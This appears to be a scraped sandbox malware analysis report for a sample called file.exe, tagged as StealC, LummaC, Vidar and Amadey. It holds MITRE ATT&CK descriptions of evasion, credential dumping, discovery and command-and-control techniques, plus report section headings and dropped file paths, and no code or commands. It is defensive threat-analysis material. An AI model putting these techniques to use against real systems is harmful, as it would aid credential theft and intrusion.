Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAFIIJDAAAAKFHIDAAAKJJEGDH

C:\ProgramData\BKFHCGID

C:\ProgramData\CBAKEBGIIDAFIDHIIECF

C:\ProgramData\DHJDAFIEHIEGDHIDGDGHDHJJJD

C:\ProgramData\ECFCBFBG

C:\ProgramData\JEBKJDAFHJDGDHJKKEGI

C:\ProgramData\KKJKEBKFCAAECAAAAAEC

Windows Analysis Report
file.exe

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre